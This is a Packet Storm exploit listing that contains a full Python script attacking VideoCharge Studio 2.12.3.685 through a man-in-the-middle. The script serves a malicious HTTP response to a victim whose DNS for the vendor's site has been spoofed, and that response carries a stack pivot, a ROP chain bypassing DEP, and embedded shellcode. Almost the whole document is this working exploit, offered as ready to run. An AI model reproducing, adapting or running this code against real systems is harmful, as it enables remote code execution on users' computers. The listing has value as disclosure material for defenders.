VideoCharge Studio 2.12.3.685 MITM Code Execution

2014-02-21T00:00:00
ID PACKETSTORM:125324
Type packetstorm
Reporter Julien Ahrens
Modified 2014-02-21T00:00:00

Description

                                        
                                            `#!/usr/bin/python  
# Exploit Title: VideoCharge Studio v2.12.3.685 GetHttpResponse() MITM Remote Code Execution Exploit (SafeSEH/ASLR/DEP Bypass)  
# Version: v2.12.3.685  
# Date: 2014-02-19  
# Author: Julien Ahrens (@MrTuxracer)  
# Homepage: http://www.rcesecurity.com  
# Software Link: http://www.videocharge.com  
# Tested on: Win7-GER (DEP enabled)  
#  
# Howto / Notes:  
# Since it's a MITM RCE you need to spoof the DNS Record for www.videocharge.com in order to successfully exploit this vulnerability  
#  
  
from socket import *  
from struct import pack  
from time import sleep  
  
host = "192.168.0.1"  
port = 80  
  
s = socket(AF_INET, SOCK_STREAM)  
s.bind((host, port))  
s.listen(1)  
print "\n[+] Listening on %d ..." % port  
  
cl, addr = s.accept()  
print "[+] Connection accepted from %s" % addr[0]  
  
# Thanks Giuseppe D'Amore for the amazing shellcode  
# http://www.exploit-db.com/exploits/28996/  
shellcode = ("\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\x8b\x52\x1c\x8b\x42"+  
"\x08\x8b\x72\x20\x8b\x12\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03"+  
"\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x31\xed\x8b"+  
"\x34\xaf\x01\xc6\x45\x81\x3e\x46\x61\x74\x61\x75\xf2\x81\x7e"+  
"\x08\x45\x78\x69\x74\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c"+  
"\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x68\x79\x74"+  
"\x65\x01\x68\x6b\x65\x6e\x42\x68\x20\x42\x72\x6f\x89\xe1\xfe"+  
"\x49\x0b\x31\xc0\x51\x50\xff\xd7")  
  
junk0 = "\x90" * 1277  
junk1 = "\x90" * 1900  
nops="\x90" * 30  
jmpesp=pack('<L',0x102340e8) * 5 # jmp esp | {PAGE_EXECUTE_READ} [cc.dll]  
  
# jump to controlled memory  
eip=pack('<L',0x61b84af1) # {pivot 4124 / 0x101c} # ADD ESP,101C # RETN [zlib1.dll]  
  
#  
# ROP registers structure:  
# EBP - VirtualProtect() call  
# ESP - lpAddress  
# EBX - dwSize  
# EDX - flNewProtect  
# ECX - lpflOldProtect  
#  
  
# Craft VirtualProtect() call (0x0080D816) via [DE2D66F9 XOR DEADBEEF] and MOV to EBP  
rop = pack('<L',0x101ff01d) # XCHG EAX,ECX # RETN [cc.dll]  
rop += pack('<L',0x61b849b6) # POP EDI # RETN [zlib1.dll]  
rop += pack('<L',0xDE2D66F9) # XOR param 1  
rop += pack('<L',0x10206ac5) # POP EBX # RETN [cc.dll]  
rop += pack('<L',0xDEADBEEF) # XOR param 2  
rop += pack('<L',0x1002fb27) # XOR EDI,EBX # ADD DL,BYTE PTR DS:[EAX] # RETN [cc.dll]  
rop += pack('<L',0x101f7572) # MOV EAX,EDI # POP EDI # RETN [cc.dll]   
rop += pack('<L',0xDEADBEEF) # Filler  
rop += pack('<L',0x101fbc62) # XCHG EAX,EBP # RETN [cc.dll]  
  
# Craft VirtualProtect() dwSize in EAX and MOV to EBX  
rop += pack('<L',0x101e66a0) # XOR EAX,EAX # RETN [cc.dll]  
rop += pack('<L',0x101f2adc) # ADD EAX,500 # RETN [cc.dll]  
rop += pack('<L',0x1023ccfb) # XCHG EAX,EBX # RETN [cc.dll]  
  
# Craft VirtualProtect() flNewProtect in EAX and MOV to EDX  
rop += pack('<L',0x101e66a0) # XOR EAX,EAX # RETN [cc.dll]  
rop += pack('<L',0x102026a1) # ADD EAX,25 # RETN [cc.dll]  
rop += pack('<L',0x102155aa) # ADD EAX,0C # RETN [cc.dll]  
rop += pack('<L',0x102155aa) # ADD EAX,0C # RETN [cc.dll]  
rop += pack('<L',0x102026b1) # ADD EAX,3 # RETN [cc.dll]  
rop += pack('<L',0x101ff01d) # XCHG EAX,ECX # RETN [cc.dll]  
rop += pack('<L',0x61b90402) # MOV EDX,ECX # RETN [zlib1.dll]  
  
# Put writable offset for VirtualProtect() lpflOldProtect to ECX  
rop += pack('<L',0x1020aacf) # POP ECX # RETN [cc.dll]  
rop += pack('<L',0x61B96180) # writable location [zlib1.dll]  
  
# POP a value from the stack after PUSHAD and POP value to ESI  
# as a preparation for the VirtualProtect() call  
rop += pack('<L',0x61b850a4) # POP ESI # RETN [zlib1.dll]  
rop += pack('<L',0x61B96180) # writable location from [zlib1.dll]  
rop += pack('<L',0x61b849b6) # POP EDI # RETN [zlib1.dll]  
rop += pack('<L',0x61b849b6) # POP EDI # RETN [zlib1.dll]  
  
# Achievement unlocked: PUSHAD  
rop += pack('<L',0x101e93d6) # PUSHAD # RETN [cc.dll]  
rop += pack('<L',0x102340c5) # jmp esp | {PAGE_EXECUTE_READ} [cc.dll]  
  
payload = junk0 + eip + junk1 + rop + jmpesp + nops + shellcode  
  
buffer = "HTTP/1.1 200 OK\r\n"  
buffer += "Date: Sat, 09 Feb 2014 13:33:37 GMT\r\n"  
buffer += "Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny16 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g\r\n"  
buffer += "X-Powered-By: PHP/5.2.6-1+lenny16\r\n"  
buffer += "Vary: Accept-Encoding\r\n"  
buffer += "Content-Length: 4000\r\n"  
buffer += "Connection: close\r\n"  
buffer += "Content-Type: text/html\r\n\r\n"  
buffer += payload  
buffer += "\r\n"  
  
print cl.recv(1000)  
  
cl.send(buffer)  
  
print "[+] Sending exploit: OK\n"  
  
sleep(3)  
cl.close()  
s.close()  
  
`